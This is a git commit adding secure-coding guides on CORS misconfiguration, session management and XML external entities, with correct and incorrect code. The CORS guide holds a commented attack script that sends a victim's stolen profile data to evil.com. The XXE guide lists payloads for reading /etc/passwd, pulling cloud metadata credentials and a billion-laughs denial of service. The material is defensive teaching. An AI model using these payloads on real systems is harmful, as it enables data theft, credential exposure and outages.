Add session management, CORS, XXE patterns

Complete the security patterns collection: - session-management.md: fixation, hijacking, secure cookies, concurrent sessions - cors.md: origin validation, reflected origin attacks, preflight caching - xxe.md: external entities, DTD attacks, language-specific fixes Now 19 patterns covering comprehensive web application security.
2026-05-10 23:20:36 -07:00
parent 5b9f30e663
commit 17c535bc61
4 changed files with 556 additions and 4 deletions
@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
 | [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
 | [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |

-### Identity
+### Identity & Session

 | File | Topic | OWASP 2025 |
 |------|-------|------------|
 | [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
 | [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
 | [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
+| [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |

 ### Attack Prevention

@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
 |------|-------|------------|
 | [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
 | [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
+| [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
 | [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
 | [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
 | [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
 | [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
+| [cors.md](cors.md) | Origin validation, credential handling | A01 |

 ### Infrastructure

@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.

 | # | Category | Pattern |
 |---|----------|---------|
-| A01 | Broken Access Control | authorization.md |
+| A01 | Broken Access Control | authorization.md, cors.md |
 | A02 | Security Misconfiguration | secure-defaults.md |
 | A03 | Software Supply Chain Failures | supply-chain.md |
 | A04 | Cryptographic Failures | cryptography.md |
-| A05 | Injection | injection-prevention.md |
+| A05 | Injection | injection-prevention.md, xxe.md |
 | A06 | Insecure Design | secure-defaults.md |
-| A07 | Authentication Failures | authentication.md, jwt-security.md |
+| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
 | A08 | Software or Data Integrity Failures | deserialization.md |
 | A09 | Security Logging and Alerting Failures | audit-logging.md |
 | A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
@@ -0,0 +1,183 @@
+# CORS Misconfiguration
+
+## Rule
+
+Never reflect Origin blindly. Allowlist specific origins. Don't use credentials with wildcards.
+
+**Source:** [OWASP CORS Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
+
+## CORS Basics
+
+Browser blocks cross-origin requests by default. CORS headers selectively allow them:
+
+| Header | Purpose |
+|--------|---------|
+| `Access-Control-Allow-Origin` | Which origins can access |
+| `Access-Control-Allow-Credentials` | Allow cookies/auth |
+| `Access-Control-Allow-Methods` | Allowed HTTP methods |
+| `Access-Control-Allow-Headers` | Allowed request headers |
+
+## Correct Pattern
+
+```python
+from flask import Flask, request
+
+ALLOWED_ORIGINS = {
+    "https://app.example.com",
+    "https://admin.example.com",
+}
+
+def add_cors_headers(response):
+    origin = request.headers.get("Origin")
+    
+    # Validate against allowlist
+    if origin in ALLOWED_ORIGINS:
+        response.headers["Access-Control-Allow-Origin"] = origin
+        response.headers["Access-Control-Allow-Credentials"] = "true"
+        response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
+        response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
+        response.headers["Vary"] = "Origin"  # Important for caching!
+    
+    return response
+
+# For public APIs without credentials
+def add_public_cors(response):
+    response.headers["Access-Control-Allow-Origin"] = "*"
+    # Note: credentials CANNOT be used with wildcard
+    response.headers["Access-Control-Allow-Methods"] = "GET"
+    return response
+
+# Handle preflight requests
+@app.route("/api/<path:path>", methods=["OPTIONS"])
+def preflight(path):
+    response = make_response()
+    return add_cors_headers(response)
+```
+
+## Incorrect Pattern
+
+```python
+# Wrong: reflect any origin (allows any site to access)
+@app.after_request
+def bad_cors(response):
+    origin = request.headers.get("Origin")
+    response.headers["Access-Control-Allow-Origin"] = origin  # Reflected!
+    response.headers["Access-Control-Allow-Credentials"] = "true"
+    return response
+    # Attack: evil.com can now make authenticated requests
+
+# Wrong: wildcard with credentials
+response.headers["Access-Control-Allow-Origin"] = "*"
+response.headers["Access-Control-Allow-Credentials"] = "true"
+# Browser will reject, but shows misunderstanding
+
+# Wrong: regex bypass
+def check_origin(origin):
+    return origin.endswith(".example.com")
+    # Bypassed by: attacker-example.com
+
+# Wrong: null origin allowed
+ALLOWED_ORIGINS = {"https://app.example.com", "null"}
+# "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!
+
+# Wrong: substring match
+def check_origin(origin):
+    return "example.com" in origin
+    # Bypassed by: example.com.evil.com
+```
+
+## Origin Validation
+
+```python
+from urllib.parse import urlparse
+
+ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
+
+def is_valid_origin(origin: str) -> bool:
+    """Strict origin validation."""
+    if not origin:
+        return False
+    
+    # Never allow null
+    if origin == "null":
+        return False
+    
+    # Exact match against allowlist
+    if origin in ALLOWED_ORIGINS:
+        return True
+    
+    # If you need subdomain matching, be careful:
+    try:
+        parsed = urlparse(origin)
+        # Must be HTTPS
+        if parsed.scheme != "https":
+            return False
+        
+        # Exact domain match (not suffix!)
+        allowed_domains = {"app.example.com", "admin.example.com"}
+        if parsed.netloc in allowed_domains:
+            return True
+        
+        # Subdomain of specific parent (careful!)
+        if parsed.netloc.endswith(".trusted.example.com"):
+            # Verify it's actually a subdomain, not suffix attack
+            parts = parsed.netloc.split(".")
+            if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
+                return True
+    except Exception:
+        return False
+    
+    return False
+```
+
+## Attack Scenarios
+
+```python
+# Scenario 1: Data theft via reflected origin
+# 
+# Vulnerable server reflects any Origin with credentials
+# 
+# Attacker's evil.com:
+# <script>
+# fetch("https://api.victim.com/user/profile", {
+#     credentials: "include"
+# })
+# .then(r => r.json())
+# .then(data => {
+#     // Send stolen data to attacker
+#     fetch("https://evil.com/steal?data=" + JSON.stringify(data))
+# })
+# </script>
+
+# Scenario 2: CSRF via CORS
+#
+# If CORS allows credentials from evil.com,
+# evil.com can make authenticated state-changing requests
+```
+
+## Preflight Caching
+
+```python
+@app.after_request
+def cors_headers(response):
+    origin = request.headers.get("Origin")
+    if origin in ALLOWED_ORIGINS:
+        response.headers["Access-Control-Allow-Origin"] = origin
+        response.headers["Access-Control-Allow-Credentials"] = "true"
+        response.headers["Access-Control-Max-Age"] = "86400"  # Cache preflight 24h
+        response.headers["Vary"] = "Origin"  # CRITICAL for caching
+    return response
+
+# Why Vary: Origin matters:
+# Without it, CDN might cache response for origin A
+# Then serve that cached response to origin B (wrong ACAO header!)
+```
+
+## Edge Cases
+
+- WebSocket connections don't use CORS (use Origin header manually)
+- `Access-Control-Expose-Headers` needed for custom response headers
+- Preflight not sent for "simple" requests (GET, POST with basic headers)
+- Internal APIs should still validate Origin (defense in depth)
+- Browser extensions can bypass CORS (not a vulnerability)
+- Server-to-server requests don't involve CORS
@@ -0,0 +1,185 @@
+# Session Management
+
+## Rule
+
+Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.
+
+**Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
+
+## Session Attacks
+
+| Attack | Description | Defense |
+|--------|-------------|---------|
+| Session fixation | Attacker sets victim's session ID | Regenerate on login |
+| Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
+| Session prediction | Guess valid session IDs | Cryptographic randomness |
+| Session replay | Reuse captured session | Short expiration, binding |
+
+## Correct Pattern
+
+```python
+import secrets
+from datetime import datetime, timedelta
+from flask import session, request
+
+# Generate cryptographically secure session ID
+def generate_session_id() -> str:
+    return secrets.token_urlsafe(32)  # 256 bits of entropy
+
+# Session configuration
+SESSION_CONFIG = {
+    "cookie_name": "__Host-session",  # __Host- prefix enforces Secure + no Domain
+    "httponly": True,      # Not accessible to JavaScript
+    "secure": True,        # HTTPS only
+    "samesite": "Lax",     # CSRF protection
+    "max_age": 3600,       # 1 hour max
+}
+
+# Regenerate session on privilege change
+def login(user: User, password: str) -> bool:
+    if not verify_password(user, password):
+        return False
+    
+    # CRITICAL: regenerate session ID to prevent fixation
+    session.regenerate()
+    
+    session["user_id"] = user.id
+    session["login_time"] = datetime.utcnow().isoformat()
+    session["ip"] = request.remote_addr
+    session["user_agent"] = request.user_agent.string
+    
+    return True
+
+def logout():
+    # Invalidate server-side, not just client cookie
+    session_id = session.get("_id")
+    if session_id:
+        invalidate_session_server_side(session_id)
+    session.clear()
+
+# Validate session binding
+def validate_session() -> bool:
+    if "user_id" not in session:
+        return False
+    
+    # Check session age
+    login_time = datetime.fromisoformat(session.get("login_time", ""))
+    if datetime.utcnow() - login_time > timedelta(hours=8):
+        logout()
+        return False
+    
+    # Optional: bind to IP (careful with mobile/proxies)
+    # if session.get("ip") != request.remote_addr:
+    #     logout()
+    #     return False
+    
+    return True
+```
+
+## Incorrect Pattern
+
+```python
+import random
+import hashlib
+
+# Wrong: predictable session ID
+def bad_session_id():
+    return str(random.randint(1000000, 9999999))
+
+# Wrong: sequential session ID
+COUNTER = 0
+def bad_session_id_2():
+    global COUNTER
+    COUNTER += 1
+    return str(COUNTER)
+
+# Wrong: user-derived session ID
+def bad_session_id_3(user_id):
+    return hashlib.md5(str(user_id).encode()).hexdigest()
+
+# Wrong: no regeneration on login (session fixation)
+def bad_login(user, password):
+    if verify_password(user, password):
+        session["user_id"] = user.id  # Same session ID!
+        return True
+    return False
+
+# Wrong: client-side only logout
+def bad_logout():
+    return redirect("/", headers={"Set-Cookie": "session=; Max-Age=0"})
+    # Session still valid server-side!
+
+# Wrong: missing cookie security flags
+app.config["SESSION_COOKIE_HTTPONLY"] = False  # XSS can steal
+app.config["SESSION_COOKIE_SECURE"] = False    # Sent over HTTP
+```
+
+## Session Fixation Attack
+
+```python
+# Attack scenario:
+# 1. Attacker visits site, gets session ID "abc123"
+# 2. Attacker sends victim link: https://site.com/?sessionid=abc123
+# 3. Victim clicks, their browser now uses "abc123"
+# 4. Victim logs in (session ID unchanged!)
+# 5. Attacker uses "abc123" - now authenticated as victim
+
+# Defense: ALWAYS regenerate on login
+@app.route("/login", methods=["POST"])
+def login():
+    if authenticate(request.form):
+        session.regenerate()  # New session ID
+        session["authenticated"] = True
+    return redirect("/")
+```
+
+## Concurrent Session Control
+
+```python
+# Limit active sessions per user
+MAX_SESSIONS_PER_USER = 3
+
+def create_session(user_id: str) -> str:
+    # Get existing sessions
+    existing = Session.query.filter_by(user_id=user_id).order_by(
+        Session.created_at.asc()
+    ).all()
+    
+    # Remove oldest if at limit
+    if len(existing) >= MAX_SESSIONS_PER_USER:
+        oldest = existing[0]
+        oldest.delete()
+        # Optionally notify user: "Logged out of oldest session"
+    
+    # Create new session
+    session_id = generate_session_id()
+    Session.create(
+        id=session_id,
+        user_id=user_id,
+        created_at=datetime.utcnow(),
+        ip=request.remote_addr
+    )
+    return session_id
+
+# Allow user to view/revoke sessions
+@app.route("/settings/sessions")
+def list_sessions():
+    sessions = Session.query.filter_by(user_id=current_user.id).all()
+    return render_template("sessions.html", sessions=sessions)
+
+@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
+def revoke_session(session_id):
+    session = Session.query.get(session_id)
+    if session and session.user_id == current_user.id:
+        session.delete()
+    return redirect("/settings/sessions")
+```
+
+## Edge Cases
+
+- Mobile apps: use short-lived access tokens, not sessions
+- "Remember me": separate long-lived token, not extended session
+- Password change should invalidate all other sessions
+- Admin impersonation needs audit trail
+- Idle timeout vs absolute timeout (both needed)
+- Session data size limits (don't store large objects)
@@ -0,0 +1,181 @@
+# XML External Entities (XXE)
+
+## Rule
+
+Disable external entity processing. Disable DTDs. Use safe parser defaults.
+
+**Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
+
+## What XXE Can Do
+
+- **File disclosure**: Read `/etc/passwd`, config files, source code
+- **SSRF**: Make requests to internal services
+- **DoS**: Billion laughs attack (exponential entity expansion)
+- **Port scanning**: Error-based probing of internal ports
+- **RCE**: In some configurations (PHP expect://)
+
+## Attack Payloads
+
+```xml
+<!-- File disclosure -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<data>&xxe;</data>
+
+<!-- SSRF to cloud metadata -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
+]>
+<data>&xxe;</data>
+
+<!-- Billion laughs DoS -->
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+  <!ENTITY lol "lol">
+  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+  <!-- ... continues exponentially -->
+]>
+<lolz>&lol9;</lolz>
+```
+
+## Correct Pattern
+
+```python
+# Python - defusedxml (recommended)
+import defusedxml.ElementTree as ET
+
+def parse_xml_safe(xml_string: str):
+    """Parse XML with XXE protection."""
+    return ET.fromstring(xml_string)
+
+# Python - standard library with safe settings
+from xml.etree.ElementTree import XMLParser, parse
+import xml.etree.ElementTree as ET
+
+def parse_xml_manual(xml_string: str):
+    """Manual safe configuration."""
+    parser = ET.XMLParser()
+    # Python's ElementTree doesn't resolve external entities by default
+    # But always verify your specific library!
+    return ET.fromstring(xml_string, parser=parser)
+
+# lxml with safe settings
+from lxml import etree
+
+def parse_xml_lxml(xml_string: str):
+    """lxml with XXE disabled."""
+    parser = etree.XMLParser(
+        resolve_entities=False,
+        no_network=True,
+        dtd_validation=False,
+        load_dtd=False,
+    )
+    return etree.fromstring(xml_string.encode(), parser=parser)
+```
+
+## Incorrect Pattern
+
+```python
+from lxml import etree
+
+# Wrong: default lxml settings allow XXE
+def bad_parse(xml_string: str):
+    return etree.fromstring(xml_string)
+
+# Wrong: explicitly enabling dangerous features
+def bad_parse_2(xml_string: str):
+    parser = etree.XMLParser(resolve_entities=True)
+    return etree.fromstring(xml_string, parser=parser)
+
+# Wrong: using xml.dom.minidom without protection
+from xml.dom.minidom import parseString
+def bad_parse_3(xml_string: str):
+    return parseString(xml_string)  # May be vulnerable
+
+# Wrong: SAX parser without disabling features
+import xml.sax
+def bad_parse_4(xml_string: str):
+    handler = MyHandler()
+    xml.sax.parseString(xml_string, handler)
+```
+
+## Language-Specific Fixes
+
+### Java
+
+```java
+// DocumentBuilderFactory
+DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
+dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+dbf.setXIncludeAware(false);
+dbf.setExpandEntityReferences(false);
+
+// SAXParserFactory
+SAXParserFactory spf = SAXParserFactory.newInstance();
+spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
+spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+```
+
+### .NET
+
+```csharp
+// XmlReader (safe by default in .NET 4.5.2+)
+XmlReaderSettings settings = new XmlReaderSettings();
+settings.DtdProcessing = DtdProcessing.Prohibit;
+settings.XmlResolver = null;
+XmlReader reader = XmlReader.Create(stream, settings);
+
+// XmlDocument
+XmlDocument doc = new XmlDocument();
+doc.XmlResolver = null;  // Disable external resources
+doc.LoadXml(xmlString);
+```
+
+### PHP
+
+```php
+// Disable entity loading globally
+libxml_disable_entity_loader(true);
+
+// Use LIBXML options
+$doc = new DOMDocument();
+$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
+// Actually, better to just not use those flags:
+$doc->loadXML($xml, LIBXML_NONET);
+```
+
+## When You Need DTDs
+
+```python
+# If you absolutely need DTD validation (rare):
+# 1. Allowlist specific DTDs
+# 2. Fetch DTDs from local filesystem only
+# 3. Never allow user-controlled DTD URLs
+
+ALLOWED_DTDS = {
+    "-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
+}
+
+class SafeResolver(etree.Resolver):
+    def resolve(self, system_url, public_id, context):
+        if public_id in ALLOWED_DTDS:
+            return self.resolve_filename(ALLOWED_DTDS[public_id], context)
+        raise ValueError(f"DTD not allowed: {public_id}")
+```
+
+## Edge Cases
+
+- SVG files are XML — validate uploads!
+- SOAP/XML-RPC endpoints are XXE targets
+- Office documents (DOCX, XLSX) contain XML
+- Configuration files (Maven pom.xml, Spring beans.xml)
+- RSS/Atom feeds
+- SAML assertions
+- Blind XXE (out-of-band data exfiltration via DNS/HTTP)